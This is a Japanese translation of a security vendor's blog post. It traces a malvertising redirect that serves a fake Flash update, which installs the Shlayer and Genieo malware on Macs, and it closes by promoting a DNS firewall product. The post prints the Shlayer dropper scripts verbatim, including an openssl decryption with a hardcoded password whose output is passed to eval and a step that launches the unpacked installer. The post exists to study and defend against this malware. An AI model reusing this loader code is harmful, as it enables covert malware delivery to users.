検証結果から見るマルウェアを送り込む不正広告の仕組みと防御する方法

オリジナルの記事はThreatSTOP社John Bambenek氏が書いたもので、本記事はその日本語訳です。オリジナルの記事（英語）は以下のURLからご覧いただけます。
https://blog.threatstop.com/how-malvertising-leads-to-fake-flash-malware

マルウェアを送り込む不正広告の動き

ここ数年、オンライン広告の増加によってWeb閲覧におけるユーザエクスペリエンスが著しく低下している、ということは周知の事実です。これに乗じて利益を生んでいるのが、オンライン広告を利用してマルウェアを配信しているサイバー攻撃者たちです。

ある日、ネットサーフィンをしていると、あるニュースサイトが、www[.]temper[.]worldにリダイレクトさせようとしているのに気が付きました。このドメインは、まだ登録されて5日目のもので、Flashが期限切れになっている、という内容の警告でフィッシングをしようとしていました。
最近Mac向けのマルウェアの調査をしていなかったので、ここは調べてみようと思いクリックしました。そうすると、まずShlayer (SHA256: 70a2250c44f1e45948169513c390c3abdfc84d806d06d535ac91c49b1d4bbec0, no VT*1 detections)がダウンロードされ、そしてShlayerがGenieo (SHA256: 0e8d54fdc43615989da4d4697a6dd8b40f54aa2001a71bc6c57a9d7a01732cec, 19/57 VT detections)をダウンロードしました。これは、AdWare/PUA（悪質ではないものの不適切と思われるもの）と分類されていますが、ユーザにインストールさせ、フィッシングをしようと騙したのは明らかですから、マルウェアと分類すべきでしょう。
（注*1： VT=VirusTotal. マルウェア検査を行うウェブサイト）

Shlayerは今回の場合、Genieoのインストーラーを生成するスクリプトによって複合化される2つの暗号化されたファイルを使用していました。パスワードはハードコードされており、オープンソースリサーチを行うと、この人物がこのパスワードを少なくとも3か月は使用していることがわかりました。スクリプトは以下の通りです。

-------------------------------------------------------------------------------

#!/bin/bash

cd "$(dirname "$BASH_SOURCE")"

fileDir="$(dirname "$(pwd -P)")"

username=$(whoami)

mkdir -p /tmp/"$username"

cp "$fileDir"/Resources/paramsJson.json /tmp/"${USER}"/paramsJson.json

cd "$fileDir"/Resources/

rm -rf /tmp/"$username"/appicon.icns

cp AppIcon.icns /tmp/"$username"/appicon.icns

eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:6341145384 <"$fileDir"/Resources/enc)"


--


#!/bin/bash

tmp_path="$(mktemp -d /tmp/XXXXXXXXX)"

openssl enc -base64 -d -aes-256-cbc -nosalt -out "$tmp_path/installer.zip" -pass pass:6341145384 < enc2

unzip "$tmp_path"/installer.zip -d "$tmp_path" > /dev/null 2>&1

echo "$tmp_path"/Installer.app

open -a "$tmp_path"/Installer.app --args "s" "$session_guid" "$volume_name"

-------------------------------------------------------------------------------

ファイルはどちらも暗号化されていたので、アンチウイルスでは、複合化が始まるまでは検知できません。面白かったのは、Player.dmgファイルが、他の新しいドメインjurisdiction[.]worldを参照していたことです。これは、一連の攻撃の中には登場していないドメインです。

DNSのセキュリティ強化が必要

この一連の攻撃では、DNSのセキュリティ強化がいかに重要か、ということがわかります。良い評価がされていない、新しいgTLD（一般トップレベルドメイン）の1つによってこのマルウェアが配信されているだけでなく、このドメインは新しく登録されたドメインで怪しく、ドメインに関するインテリジェンスを持っているDNSファイアウィールであれば、すぐにドメインを悪意のあるものと特定し、ブロックすることが出来たでしょう。

IPアドレスで判断してブロックする、という考えもありますが、この場合はドメインがAkamaiにホストされているので、問題ないドメインが巻き添えでブロックされ、過防御になってしまう可能性もあります。新しく登録されたドメインや新たに発見されたドメインをブロックすることで、攻撃をブロックすることが可能です。

DNSサーバをDNSファイアウォールに変える

DNSのセキュリティ強化が必要なのはわかった。でも、DNSサーバを入れ替えるのは大がかりな話。様々な設定変更が必要で、正直やりたくない、と思う方が多いのではないでしょうか。

参考記事：DNSサーバのリプレースで実現するDNS Firewall

入れ替えの手間を省き、既存のDNSサーバをDNSファイアウォールに変身させることを可能にしたのが、今回の調査を行ったThreatSTOP社が開発し、NVCが提供するThreatSTOP DNSファイアウォール ソリューションです。

BINDやWindows Server 2016で構成されたDNSサーバに対してThreatSTOPが持つ脅威インテリジェンスを反映することで、DNSサーバを、脅威の通信を判断しブロックするDNSファイアウォールに生まれ変わらせることができます。

ぜひ、ご検討ください。